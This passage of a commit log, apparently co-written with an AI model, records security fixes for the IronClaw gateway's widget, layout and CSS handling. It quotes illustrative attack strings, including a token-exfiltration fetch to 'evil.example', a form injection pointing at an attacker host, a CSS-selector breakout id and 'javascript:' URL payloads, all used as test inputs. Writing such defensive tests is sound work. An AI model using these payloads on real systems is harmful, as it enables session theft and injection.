   The new tests in this PR changed scheduling enough to surface the
   race on every run. Fixed by acquiring the same `ScopedEnvVar` lock
   and clearing the override inside the test, making it deterministic.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero warnings
- `cargo test --no-default-features --features libsql --lib` — 4284 passed
- `cargo test -p ironclaw_gateway` — 50 unit + 1 doctest passed (was 46)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* ci: nudge workflows for b88d4554 (Actions trigger missed)

* fix(gateway): address PR #1725 zmanian review

Five items raised in zmanian's 2026-04-08 review (approved). None are
blockers; this sweep avoids carrying them as follow-up debt.

1. **Document widget trust model**
   (`src/workspace/seeds/FRONTEND.md`). New "Security model" section
   spells out that widgets run with full session authority via
   `IronClaw.api.fetch`, share the same DOM as the built-in tabs, and
   are *not* sandboxed at the JS layer. The trust boundary lives one
   layer up: anything that can `memory_write` a widget file already
   has agent authority. Operators who want stricter isolation should
   mount untrusted UI in an `<iframe sandbox>` from a trusted widget.

2. **Extract shared `read_layout_config` helper**
   (`src/channels/web/handlers/frontend.rs`,
    `src/channels/web/server.rs`). Both
   `frontend_layout_handler` and `build_frontend_html` had identical
   read-parse-fallback bodies — the kind of drift trap zmanian flagged.
   Hoisted the helper into `handlers/frontend.rs` as
   `pub async fn read_layout_config`; `server.rs` deletes its private
   copy and imports the shared one. The single source of truth means a
   future change to the warning text or fallback semantics lands once.

3. **Escape `def.id` and `e.message` in `_addWidgetTab` error path**
   (`crates/ironclaw_gateway/static/app.js`). The catch block built
   the failure banner via `innerHTML` with raw interpolation. CSP
   blocks the script vector, but every other innerHTML write in this
   file routes user-controlled strings through `escapeHtml()`, and an
   inconsistent escape discipline is exactly the kind of regression
   future readers shouldn't have to re-litigate. Now wraps both
   `def.id` and `String(e?.message ?? e)` in `escapeHtml`.

4. **Gate `upgradeInlineJson` behind opt-in flag**
   (`crates/ironclaw_gateway/src/layout.rs`,
    `crates/ironclaw_gateway/static/app.js`,
    `src/channels/web/server.rs`). The bracket-counting heuristic
   pattern-matches any balanced `{...}` in rendered markdown — prose
   like `"set the value to {x: 1, y: 2}"` gets mangled into a styled
   data card. New `ChatConfig::upgrade_inline_json: Option<bool>`
   defaults to `None` (off); operators that pipe structured data
   through chat can flip it on via `.system/gateway/layout.json`.
   `app.js` checks `window.__IRONCLAW_LAYOUT__.chat.upgrade_inline_json
   === true` before invoking the rewrite. Also added the field to
   `layout_has_customizations` so a layout that only sets this flag
   still triggers the customized HTML path. Two new `ironclaw_gateway`
   tests pin the default-off serde shape and the explicit-true
   round-trip (omitted field must not appear in serialized output).

5. **ETag cache-busting on `/style.css`**
   (`src/channels/web/server.rs`). Operators editing `custom.css` had
   to ask users to hard-refresh because the response carried only
   `Cache-Control: no-cache` with no validator. Added `css_etag()`
   producing a strong `"sha256-…"` validator over the assembled body
   (16 hex chars / 64 bits — plenty for content addressing on a
   single-tenant CSS payload). `css_handler` now extracts the request
   `HeaderMap`, honors `If-None-Match` (exact match or `*`) with a
   `304 Not Modified` + empty body, and otherwise emits `ETag` on the
   200 response. The `Cache-Control: no-cache` stays so the browser
   always revalidates — together with the ETag this gives "fast 304"
   semantics rather than a stale `max-age` window where edits don't
   show up. Four new tests in `server.rs::tests`:
   - `test_css_etag_is_strong_validator_format` (no `W/`, quoted,
     ASCII)
   - `test_css_etag_changes_when_body_changes` (single-byte mutation
     invalidates)
   - `test_css_etag_stable_for_identical_body` (cache hit reproducible)
   - `test_css_handler_returns_etag_and_serves_304_on_match` (full
     handler round-trip via `tower::ServiceExt::oneshot`: 200 → ETag →
     304 on match → 200 on stale validator)

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
  (was 50; +2 for the new chat-config flag tests)
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 334 passed (includes the 4 new ETag tests, the existing widget
  loader tests, and the shared `read_layout_config` callers on both
  ends)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): land deferred items from PR #1725 paranoid-architect summary

Both items the previous sweep (1c361d42) explicitly deferred. Closing
the loop so they don't get lost as follow-up debt.

1. **`assemble_index` no longer silently drops layout serialization
   failures** (`crates/ironclaw_gateway/src/bundle.rs`). The
   `if let Ok(layout_json) = serde_json::to_string(&bundle.layout)`
   shortcut would discard the entire `window.__IRONCLAW_LAYOUT__`
   injection on error and the customized HTML would ship without any
   branding/tab/chat customizations applied — and the IIFE in `app.js`
   would no-op them all without leaving a trace. The branch is
   unreachable on well-typed input (`LayoutConfig` and every nested
   type derive `Serialize` cleanly), but a future field that adds a
   serialization-fallible type — `serde_json::Value`, a custom
   `Serialize` impl, an `i128` — would silently regress the entire
   customization path. Now the error branch logs `tracing::warn!` with
   the serde error so the failure is observable.

   Required pulling `tracing = "0.1"` into `crates/ironclaw_gateway/`
   (already in the workspace dep set; the gateway crate just hadn't
   needed it yet).

2. **`default_tab` is applied after the widget queue drains**
   (`crates/ironclaw_gateway/static/app.js`). The layout-config IIFE
   used to call `switchTab(layout.tabs.default_tab)` from inside the
   same block that handled branding/tabs/chat. That block runs *before*
   `_widgetInitQueue.drain` mounts widget panels, so any widget-provided
   tab id (e.g. `default_tab: "dashboard"` where `dashboard` comes from
   a registered widget) silently no-ops — `switchTab` looks up
   `#tab-dashboard`, finds nothing, and the user lands on the default
   built-in tab instead. The setting appeared broken to anyone who
   tried it.

   Fix: hoist the `default_tab` switch out of the layout IIFE and place
   it after the `_widgetInitQueue` drain. Hash navigation still wins
   (so `#chat` deep-links survive a customized `default_tab`), and the
   block only runs when a layout was actually injected. Left an
   inline `NOTE` at the original site so a future contributor doesn't
   "helpfully" move it back inside the IIFE.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
  (no count change; #1 is a logging path with no new test surface and
  #2 is JS-side)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* chore: update Cargo.lock for ironclaw_gateway tracing dep

Forgotten in 8edca735, which added `tracing = "0.1"` to
`crates/ironclaw_gateway/Cargo.toml` to support the new
`tracing::warn!` on layout serialization failure in `assemble_index`.
The `tracing` crate is already pulled in transitively elsewhere in the
workspace, so this is purely a manifest-side dependency declaration.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): align layout selectors with real DOM (PR #1725 Copilot review)

Two "low confidence" findings from the latest Copilot review pass that
are both real bugs — the affected layout flags silently no-opped
because the JS selectors didn't match the elements actually rendered
by `static/index.html`.

1. **`tabs.hidden` only matched widget tabs, not built-ins.**
   `_addWidgetTab` creates buttons with `class="tab-btn"`, but the
   built-in tab `<button>`s in `index.html:157-162` are plain
   `<button data-tab="chat">` etc. with no class. The previous
   selector — `.tab-btn[data-tab="…"]` — therefore only matched
   widget-injected buttons, so a layout like
   `tabs.hidden: ["routines"]` (a built-in) silently did nothing.
   Switched to `.tab-bar button[data-tab="…"]`, which matches both
   variants while still scoping the lookup to the tab bar (so a stray
   `<button data-tab>` elsewhere on the page can't be hidden by
   accident).

2. **`chat.image_upload === false` targeted a non-existent element.**
   The handler tried to hide `#image-upload-btn`, but the actual
   composer in `index.html` uses `#attach-btn` (the visible paperclip)
   and `#image-file-input` (the hidden file input). The flag therefore
   never disabled image uploads. Now hides `#attach-btn` AND sets
   `#image-file-input.disabled = true`, so a programmatic
   `document.getElementById('image-file-input').click()` from a
   widget or extension can't bypass the operator's intent — the
   capability is actually gone, not just the chrome.

Both bugs share the same root cause: the layout-config IIFE was
written against a hypothetical DOM rather than the one
`index.html` ships, and there's no e2e test that exercises a layout
with `tabs.hidden` set to a built-in or `chat.image_upload: false`,
so the regression slid through. (A follow-up Playwright scenario
would catch the next instance of this — tracking separately rather
than expanding the scope of this PR.)

Quality gate:
- `cargo fmt` clean
- `cargo clippy -p ironclaw_gateway --tests` zero warnings
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
  (no count change; both fixes are JS-side)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(e2e): regression test for layout selector / DOM drift (PR #1725)

The two `app.js` selector bugs Copilot caught in PR #1725 review pass
4072914579 (`tabs.hidden` only matched widget-injected `.tab-btn`
buttons rather than built-in plain `<button data-tab>`s, and
`chat.image_upload === false` targeted a non-existent
`#image-upload-btn` instead of `#attach-btn` / `#image-file-input`)
both slid through code review for the same root reason: there was no
e2e test that loaded a customized layout and asked the browser whether
the flags actually took effect. The unit tests on the Rust side
verified `LayoutConfig` round-trips, and the existing widget-tab test
exercised the *widget* path of the same selectors — neither would have
caught a built-in-tab regression or a wrong DOM id.

New scenario:
`test_layout_hidden_built_in_tab_and_image_upload_disabled`

* Writes a `.system/gateway/layout.json` with `tabs.hidden:
  ["routines"]` (a built-in, on purpose — the previous bug was that
  only widget tabs could be hidden, so the built-in is exactly what
  the selector regression broke) and `chat.image_upload: false`.
* Drives the write directly via `/api/memory/write` rather than chat.
  The customization path is independent of the agent loop, and
  side-stepping the mock LLM keeps the test fast and decoupled from
  the canned-response set.
* Reloads the gateway in a fresh browser context so `assemble_index`
  re-runs and `window.__IRONCLAW_LAYOUT__` carries the new flags.
* Asserts via `getComputedStyle` (not the inline `style` attribute,
  so the assertion survives a future refactor that swaps
  `style.display = 'none'` for a class toggle):
  - The `routines` built-in tab has `display: none`.
  - `chat`, `memory`, and `settings` built-in tabs are still visible
    (catches accidental over-matching by a future selector change).
  - `#attach-btn` has `display: none`.
  - `#image-file-input.disabled === true`. Asserting BOTH the visible
    button hide AND the underlying input disable is the contract — a
    widget that calls
    `document.getElementById('image-file-input').click()` must NOT be
    able to bypass the operator's intent.
* Each "tab disappeared from the DOM entirely" / "input doesn't exist"
  case has a distinct error message so a future `index.html`
  restructure produces an actionable failure rather than a confusing
  null-deref.

Also added `.system/gateway/layout.json` to `_CUSTOM_PATHS` so
`_wipe_customizations` clears it between tests in the shared
session-scoped server fixture.

Could not run the test locally — the e2e suite requires a libsql
ironclaw binary build (~10 min) plus a Python venv with Playwright,
neither of which is set up in this environment. Test is written
against the same `_open_authed_page` / `_CUSTOM_PATHS` /
`memory/write` patterns the rest of the file uses, and the DOM ids
were grepped out of `crates/ironclaw_gateway/static/index.html`
directly (`#attach-btn`, `#image-file-input`,
`<button data-tab="routines">`). First real exercise will be in CI.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): refuse customized index in multi-tenant mode (PR #1725 blocker)

Cross-tenant cache leak — `frontend_html_cache` is a single
`Arc<RwLock<Option<FrontendHtmlCache>>>` per `GatewayState` with no
user dimension, and `build_frontend_html` reads `state.workspace`
directly. In multi-tenant deployments
(`resolve_workspace(&state, &user)` driven by `workspace_pool`) this
is unsafe in two compounding ways:

1. **Latent**: even without the cache, `build_frontend_html` reading
   `state.workspace` ignores the per-user pool entirely. If the
   single-user fallback workspace is also populated, every user sees
   that one global workspace's `layout.json` / widgets — one
   operator's branding, hidden tabs, and registered widgets leak to
   every other tenant on the same gateway.

2. **Cache pin**: even if (1) were fixed, the cache key is just
   `(.system/gateway/layout.json mtime, .system/gateway/widgets/
   mtime)` against the global workspace — there is no `user_id` in
   the key. Once the slot is populated, every subsequent `GET /` hits
   the same HTML.

Root cause: the customization assembly path is fundamentally
single-tenant. `index_handler` (`GET /`) is the unauthenticated
bootstrap route — no user identity is available at request time, so
there is no way to resolve the *correct* per-user workspace inside
`build_frontend_html`. The reviewer flagged this as a cache bug; it's
actually an architectural mismatch that the cache makes visible.

**Fix:** in multi-tenant mode (`workspace_pool` set),
`build_frontend_html` short-circuits with `return None` BEFORE
reading `state.workspace` and BEFORE the cache write at the bottom of
the function. The embedded default `INDEX_HTML` is then served to
every user, the static CSP layer applies unchanged (no inline
scripts, no nonce needed), and the cache slot stays empty so it
cannot pin any leaked HTML.

This is the minimal fix that makes the gateway safe to ship in
multi-tenant mode. Per-user customization in multi-tenant deployments
will land in a follow-up PR via a JS-side `fetch('/api/frontend/layout')`
after auth — that endpoint already exists and already routes through
`resolve_workspace(&state, &user)`, so it returns the right workspace.
The layout-config IIFE in `crates/ironclaw_gateway/static/app.js`
already reads `window.__IRONCLAW_LAYOUT__`, which a future change can
populate from that fetch instead of from server-side HTML injection.

Documented the constraint in the doc comment on `build_frontend_html`
so future contributors understand WHY the early return is there
(hands-tied at the unauthenticated route, not laziness) and what the
correct path forward looks like.

Regression test:
`test_build_frontend_html_returns_none_in_multi_tenant_mode` (gated
on `feature = "libsql"` for the workspace backend). The test seeds a
*global* workspace with a hostile-looking layout
(`{"branding":{"title":"TENANT-LEAK-BAIT"}}`) AND a `WorkspacePool`,
attaches both to the GatewayState via `Arc::get_mut`, and asserts:

  1. `build_frontend_html` returns `None` — if it ever reads
     `state.workspace` again in multi-tenant mode, the bait title
     would land in the assembled HTML and this test would fail loudly
     with an actionable diagnostic.
  2. `state.frontend_html_cache` slot is still `None` after the call
     — the early return must short-circuit BEFORE the cache write at
     the bottom of the function, otherwise a poisoned entry would
     serve the leaked HTML to subsequent requests even after the bug
     is fixed.

Both contracts are independent — a future regression that breaks one
without the other is still caught.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 335 passed (was 334; +1 for the new multi-tenant guard test)
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 Copilot review (6 findings)

Six new inline findings from the latest Copilot review pass on
PR #1725. All verified against the source — no false positives this
round. Grouped by file:

**1+2. Widget directory names not validated against `is_safe_segment`**
(`src/channels/web/handlers/frontend.rs`). Both `load_widget_manifests`
and `load_resolved_widgets` fed `entry.name()` straight into
`read_widget_manifest`, which composed `{WIDGETS_DIR}{name}/manifest.json`
and friends without checking the segment. Any filesystem-backed
`Workspace` implementation that doesn't normalize `.`/`..`/backslash/NUL
components would have allowed a widget directory called `..` (or with
embedded separators) to escape the `.system/gateway/widgets/` subtree.

The natural chokepoint is `read_widget_manifest` itself — both call
sites already route through it for the `manifest.id == directory_name`
check, so adding a single `is_safe_segment(directory_name)` guard at
the top of that function fixes both call paths at once. Same validator
the public `/api/frontend/widget/{id}/{*file}` endpoint already
enforces, so widget *discovery* is now in line with widget *serving*.

Regression test `skips_widget_with_unsafe_directory_name` covers `..`,
`.`, embedded `/`, embedded `\`, and embedded NUL — five distinct
rejection vectors. Probes `read_widget_manifest` directly so it
covers both call sites with one tokio test.

**3. `layout_has_customizations` over-triggers on empty branding colors**
(`src/channels/web/server.rs`). Treating `branding.colors.is_some()`
as a customization forced the per-response nonce CSP path even when
both `primary` and `accent` were `None` or whitespace-only (which
the `is_safe_css_color` validator strips at injection time). Replaced
with a `has_branding_colors` check that requires at least one
trimmed-non-empty color field, mirroring what `BrandingConfig::to_css_vars`
actually emits. No security impact, just removes a pointless slow
path that produced zero effective branding output.

**4. FRONTEND.md "eval-equivalent constructs" claim was factually wrong**
(`src/workspace/seeds/FRONTEND.md:71`). The Security model section
told operators that widgets can use "`eval`-equivalent constructs that
don't trip the CSP". The gateway CSP does NOT include `'unsafe-eval'`,
so `eval()`, `new Function()`, and string-form `setTimeout` /
`setInterval` are all blocked by the browser. Rewrote the sentence to
describe what widgets *actually* have access to: `IronClaw.api.fetch`
against same-origin endpoints, full DOM mutation, event listeners on
the chat input, and dynamic `import()` from any origin allowed by the
gateway's `script-src` (`'self'`, jsDelivr, cdnjs, esm.sh). The CSP
narrows the *shape* of attacks a widget can mount, not the blast
radius — the real trust boundary is still `memory_write` access to
the workspace.

**5. Bare-string `replace(NONCE_PLACEHOLDER, ...)` could mutate widget bodies**
(`src/channels/web/server.rs`). `index_handler` previously did
`html.replace(NONCE_PLACEHOLDER, &nonce)` to swap the per-response
nonce into the assembled HTML. A widget author who wrote the literal
string `__IRONCLAW_CSP_NONCE__` in their own JS — in a comment, log
line, test fixture, or string constant — would have had their source
silently mutated into a per-request nonce, breaking the widget in a
way that's nearly impossible to debug.

Extracted `stamp_nonce_into_html(html, nonce)` helper that targets
the full attribute form `nonce="__IRONCLAW_CSP_NONCE__"` instead of
the bare placeholder. The double-quoted sentinel is unambiguous in
HTML context — it can never accidentally match free text in a JS
module body, a comment, or a JSON payload. Two regression tests:

  - `test_stamp_nonce_into_html_replaces_attribute` — vanilla
    happy path, attribute on a `<script>` tag is rewritten.
  - `test_stamp_nonce_into_html_does_not_mutate_widget_body` —
    builds a fragment with TWO sentinels: one in the legitimate
    attribute (must be replaced) and one in the script body as a
    `const SENTINEL = "..."` constant (must NOT be replaced).
    Asserts the attribute was rewritten, the body sentinel
    survived intact, and exactly one occurrence of the placeholder
    remains in the result. A future regression to a bare-string
    replace would drop the body occurrence count to 0 and fail
    loudly with the diff.

**6. `mock_llm._normalize_tool_calls` would crash on non-dict list elements**
(`tests/e2e/mock_llm.py`). The function called `item.get(...)` on
every list element with no shape check. A future `TOOL_CALL_PATTERNS`
entry that accidentally returned a list of tuples / strings / `None`
would crash mid-request with an opaque
`AttributeError: 'tuple' object has no attribute 'get'` deep inside
aiohttp's request handler, taking the whole mock server down for
every test in the same `pytest` invocation.

Added `isinstance` guards on both the list element AND its
`arguments` field, plus a similar guard on the single-call branch.
Each raises a clear `TypeError` naming the offending tool, the list
index, and the unexpected type — so a malformed pattern fails at the
exact line of the offense rather than as collateral damage three
frames deep in aiohttp.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 338 passed (was 335; +3 for the new tests:
  `test_stamp_nonce_into_html_replaces_attribute`,
  `test_stamp_nonce_into_html_does_not_mutate_widget_body`,
  `skips_widget_with_unsafe_directory_name`)
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
- `python3 -m py_compile tests/e2e/mock_llm.py` clean

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 serrrfirat round 2 (multi-tenant CSS + URL validation)

Two new findings from the latest serrrfirat review pass on PR #1725.
A third finding (NONCE_PLACEHOLDER global replace mutating widget
bodies) was already resolved in 56c43f56 — `stamp_nonce_into_html` is
attribute-targeted with regression tests `test_stamp_nonce_into_html_
replaces_attribute` and `test_stamp_nonce_into_html_does_not_mutate_
widget_body` already locking the contract.

**1. Medium — `css_handler` missing multi-tenant guard**
(`src/channels/web/server.rs`). When I fixed `build_frontend_html`
in b9da40e7 to refuse the customization assembly path under
`workspace_pool.is_some()`, I missed the sibling `css_handler` —
which still read `state.workspace` unconditionally to layer
`.system/gateway/custom.css` onto `/style.css`. Same shape as the
index leak: in multi-tenant mode the CSS handler would serve one
operator's custom.css to every other tenant via the
unauthenticated `/style.css` bootstrap route. Now mirrors the
sibling guard:

  let css = if state.workspace_pool.is_some() {
      Cow::Borrowed(assets::STYLE_CSS)  // refuse overlay path
  } else {
      // ... existing single-tenant overlay path
  };

The early return bypasses the workspace read entirely, so the
hot path stays allocation-free (`Cow::Borrowed`). Per-user CSS
overrides can ride a future authenticated `/api/frontend/custom-css`
endpoint that routes through `resolve_workspace(&state, &user)`,
mirroring the same follow-up plan for `/api/frontend/layout`.

Regression test `test_css_handler_returns_base_in_multi_tenant_mode`
(libsql-gated): seeds a global workspace with hostile-looking
custom.css containing the literal string `TENANT-LEAK-BAIT`,
attaches both the workspace AND a `WorkspacePool` to the
GatewayState via `Arc::get_mut`, hits `/style.css` via
`tower::ServiceExt::oneshot`, and asserts:

  1. The bait marker is absent from the response body (catches a
     future regression that re-reads `state.workspace` in
     multi-tenant mode — the leaked content would land in the
     diagnostic).
  2. The response body equals `assets::STYLE_CSS` byte-for-byte
     (catches a subtler regression where the leak content is
     dropped but the multi-tenant path still does the owned
     `format!`, breaking the borrowed hot-path optimization).

Both contracts are independent — a future regression breaking
either alone is still caught.

**2. Medium — `logo_url` / `favicon_url` not validated**
(`crates/ironclaw_gateway/src/layout.rs`). `BrandingConfig` had
defense-in-depth for color values via `is_safe_css_color`, but
URL fields accepted arbitrary strings. There's no current consumer
in the `app.js` IIFE (the layout-config block doesn't read them
yet), so no current vulnerability — but they're exposed via
`GET /api/frontend/layout` and the `window.__IRONCLAW_LAYOUT__`
JSON island, so the first consumer that renders them as
`<img src="…">` or `<link rel="icon" href="…">` would inherit a
latent footgun: `javascript:` URI XSS, `data:` URI payload stash,
tracking-pixel exfiltration via attacker-controlled domains.

Added `is_safe_url(value: &str) -> bool` validator (`pub(crate)`,
mirroring `is_safe_css_color`) that accepts:
  - HTTPS / HTTP absolute URLs (HTTP allowed for intranet/dev
    usability — gateway enforces TLS at the network layer)
  - Site-relative paths (`/static/logo.png`) — must start with a
    single `/`, NOT `//` (protocol-relative URLs are
    scheme-flippable in the browser URL parser and historically a
    CSP-bypass source)

And rejects:
  - `javascript:`, `data:`, `vbscript:`, `file:`, `blob:`, any
    other non-HTTP(S) scheme
  - HTML attribute breakout vectors (`<`, `>`, `"`, `'`, backtick,
    backslash)
  - Control chars (NUL, newline, CR, tab) for copy-paste
    smuggling defense
  - Empty / whitespace-only / > 2048 bytes (matches the de-facto
    Chrome / Apache URL length cap)

Added `BrandingConfig::safe_logo_url(&self) -> Option<&str>` and
`safe_favicon_url(&self) -> Option<&str>` getters that return
`None` when the underlying field fails validation. This is the
contract any future consumer must use — routing through the
getter keeps validation at the type layer so a future caller
can't accidentally bypass it by reading the raw `Option<String>`
field.

Updated `layout_has_customizations` in server.rs to call the new
getters instead of `b.logo_url.is_some()` / `b.favicon_url.is_some()`,
mirroring the precedent set for branding colors: a `layout.json`
that only sets `logo_url: "javascript:alert(1)"` (and nothing
else) no longer triggers the customized HTML path because the
value gets dropped at the validator. Symmetric with how empty
branding colors are gated.

Tests in `layout::tests`:
  - `test_is_safe_url_accepts_common_forms` — HTTPS, HTTP,
    site-relative, leading/trailing whitespace
  - `test_is_safe_url_rejects_injection_vectors` — full classifier
    sweep: `javascript:` (case-insensitive), `data:`, `vbscript:`,
    `file:`, `blob:`, protocol-relative `//`, every HTML breakout
    char, every control char, empty, whitespace-only, length cap
    (asserts both the 2049-char rejection AND the 2048-char limit
    boundary), no-scheme bare hostname, single `/` root path
  - `test_branding_safe_logo_url_filters_invalid` — round-trip
    contract: safe values pass through, hostile values return None,
    absent values return None
  - `test_branding_safe_favicon_url_filters_invalid` — same
    contract for the parallel field so a future consumer can never
    accidentally route favicon through a bypass while logo is
    correctly validated

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests`
  zero warnings
- `cargo test -p ironclaw_gateway` — 56 unit + 1 doctest passed
  (was 52; +4 for the URL validator tests)
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 339 passed (was 338; +1 for the css_handler multi-tenant
  guard test)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 paranoid review round 3 (7 findings)

Seven items from serrrfirat's third paranoid-architect pass on
PR #1725. Two HIGH (token exfil + chat-renderer DOM bypass), three
MEDIUM (widget id CSS injection + admin role on layout write + URL
field visibility), one LOW (workspace path leak in 404), and one test
coverage gap (CSP nonce e2e). Five "verified fixed" items from the
audit need no code change — replied separately on the audit thread.

**P-JS2 (HIGH) — IronClaw.api.fetch same-origin guard**
(`crates/ironclaw_gateway/static/app.js`). The widget API's `fetch`
method injected the session `Authorization: Bearer <token>` into
*any* URL, including absolute cross-origin URLs. A widget calling
`IronClaw.api.fetch('https://evil.example/steal')` would have
exfiltrated the user's session token. Now resolves `path` against
`window.location.origin` and rejects with a `TypeError` if the
resulting origin differs from the gateway's. Same-origin and
relative paths still work; site-relative `/api/foo`, `https://<this-host>/api/foo`,
and other intra-origin shapes pass through unchanged. The error
message names both the requested origin and the expected origin so
the widget author sees the misuse at the offending call site.

**P-JS1 (HIGH) — sanitize after registerChatRenderer callback**
(`crates/ironclaw_gateway/static/app.js`). `renderMarkdown` runs
`sanitizeRenderedHtml` (DOMPurify) on its output BEFORE
`upgradeStructuredData` invokes registered chat renderers. A
renderer's `render(contentEl, ...)` callback receives the live
`.message-content` DOM element and can call
`contentEl.innerHTML = '<form action="https://attacker">...'`,
bypassing the sanitization step entirely. CSP blocks `<script>`
execution either way, but form / iframe / object / clickjack-overlay
injection still works. Now re-runs `sanitizeRenderedHtml` on
`contentEl.innerHTML` after the renderer returns. DOMPurify is
idempotent on already-safe HTML so the cost on the happy path is
bounded by the sanitizer's walk of the post-renderer subtree.

**P-W4 + P-H10 (MEDIUM) — widget id charset validation**
(`crates/ironclaw_gateway/src/layout.rs`,
`src/channels/web/handlers/frontend.rs`). `scope_css` raw-interpolates
the widget id into `[data-widget="<id>"]` with no escape pass; a
manifest id like `x"],.evil{color:red}[x` would close the attribute
selector and inject arbitrary CSS rules. The HTML attribute side is
already protected by `escape_html_attr`, but defense-in-depth at the
type level closes both vectors and protects every future call site
that interpolates the id without thinking about it.

Added `is_safe_widget_id(s) -> bool` (`pub` in `layout.rs`,
re-exported from `lib.rs`): `^[a-zA-Z0-9][a-zA-Z0-9._-]*$`, ≤64
chars. The first-char-must-be-alphanumeric rule means an id can't
look like an option flag (`-foo`), a hidden file (`.foo`), or a
separator fragment. Enforced at the chokepoint
`read_widget_manifest` in `handlers/frontend.rs` alongside the
existing `is_safe_segment(directory_name)` check, so a hostile
manifest is rejected at load time before any rendering layer (CSS,
HTML, path composition) sees the id.

The reject-then-mismatch-check ordering matters: a hostile id is
logged as "unsafe charset" rather than as a directory mismatch,
which is the more useful diagnostic. Two new test layers:

  - `is_safe_widget_id_accepts_existing_fixtures` — every widget id
    used in test fixtures and FRONTEND.md examples must remain
    valid. Narrowing the regex after these have shipped would be a
    breaking change, so this test pins the contract.
  - `is_safe_widget_id_rejects_injection_payloads` — full sweep:
    serrrfirat's CSS-selector breakout payload, HTML attribute
    breakouts, path traversal vectors, whitespace, control chars,
    non-ASCII, leading non-alphanumeric, empty, and the 64-char
    boundary (64 passes, 65 fails).
  - `widget_loader::skips_widget_when_manifest_id_fails_charset_check`
    — end-to-end regression: write a manifest with the CSS-selector
    breakout id under a directory name that DOES pass
    `is_safe_segment`, and verify both `read_widget_manifest` and
    `load_resolved_widgets` reject it. Catches a future regression
    that moves the check away from the chokepoint.

**P-H9 (MEDIUM) — AdminUser on layout write endpoint**
(`src/channels/web/handlers/frontend.rs`).
`frontend_layout_update_handler` used `AuthenticatedUser` (any
role), so a `member`-role token holder could rewrite the global
layout in single-tenant mode — changing branding, hiding tabs,
disabling widgets for every user of the gateway. Switched to
`AdminUser`. In multi-tenant mode this still scopes per-user via
`resolve_workspace`, so admins configuring their own tenant get the
expected behavior; member tokens are now denied at the role gate
the same way they're denied for user management and secrets
management. `AdminUser` is a `pub struct AdminUser(pub UserIdentity)`
so the existing `&user` argument to `resolve_workspace` works
without changes — added it to the existing `use ...auth::{...}`
import alongside `AuthenticatedUser`.

**P-L3 (MEDIUM) — sanitize URL fields on serialize + downgrade
visibility** (`crates/ironclaw_gateway/src/layout.rs`).
`safe_logo_url` / `safe_favicon_url` getters existed with proper
`is_safe_url` validation, but the underlying `pub Option<String>`
fields were directly accessible — both for Rust callers (who could
read them by name without going through the validator) and for the
JS side via the `window.__IRONCLAW_LAYOUT__` JSON island, which
serializes the raw struct. A future consumer rendering
`<a href="${layout.branding.logo_url}">` would inherit the
`javascript:` URI XSS that the safe getter is supposed to prevent.

Two-part fix:

  1. Downgraded `logo_url` and `favicon_url` to `pub(crate)`. All
     existing constructors are intra-crate (verified by grep), so
     no public API breakage. External Rust callers must now route
     through the safe getters by construction.
  2. Added `skip_unsafe_url` serde predicate
     (`#[serde(skip_serializing_if = "skip_unsafe_url")]`) that
     drops the field from JSON output when the value is missing,
     empty, or fails `is_safe_url`. Closes the wire-format leg: even
     if a future intra-crate caller bypasses the getters and writes
     a hostile value into the field directly, the JSON shipped to
     the JS side and to `GET /api/frontend/layout` simply omits the
     field entirely. No `null`, no `javascript:` payload, nothing
     for a future consumer to inadvertently render.

The first iteration tried `serialize_with` for the same job, but
that runs *after* `skip_serializing_if` so a hostile value
serialized as `null` instead of being skipped. Predicate-side
filtering is the correct shape — `skip_unsafe_url` returns `true`
on every "drop the field" branch and `false` only when the value is
present-and-safe.

Two new tests pin both the wire format and the happy path:
  - `branding_serialize_drops_hostile_urls` — serializes a config
    with `javascript:` and `data:` URIs and asserts the resulting
    JSON contains neither `logo_url` nor `favicon_url` keys, AND
    that the hostile payload strings don't appear anywhere in the
    output.
  - `branding_serialize_preserves_safe_urls` — round-trip check:
    `https://example.com/logo.png` and `/favicon.ico` survive
    serialization unchanged so legitimate operator branding still
    reaches the JS side.

**P-H1 (LOW) — strip workspace path from widget 404 error**
(`src/channels/web/handlers/frontend.rs`). The handler returned
`format!("Widget file not found: {path}")`, leaking the resolved
`.system/gateway/widgets/{id}/{file}` path back to the caller. That
gives an attacker a free oracle for "what directories exist" inside
the workspace. Now returns the generic message
`"Widget file not found"` and logs the full path internally via
`tracing::warn!` so debugging a 404 still works.

…
…steps for skills (#2216)

* fix: explain in more details`activation` block & installation steps for skills

* chore: apply review from gemini

---------

Co-authored-by: Guille <gagdiez.c@gmail.com>
* fix(bridge): sanitize auth_url on engine v2 path (#2206)

The engine-v2 effect adapter forwarded `auth_url` from
`tool_activate`/`tool_auth` output (and from the v2 pre-flight auth
gates) directly into `ResumeKind::Authentication` without scheme
validation, leaving the v2 path open to `javascript:`, `file://`,
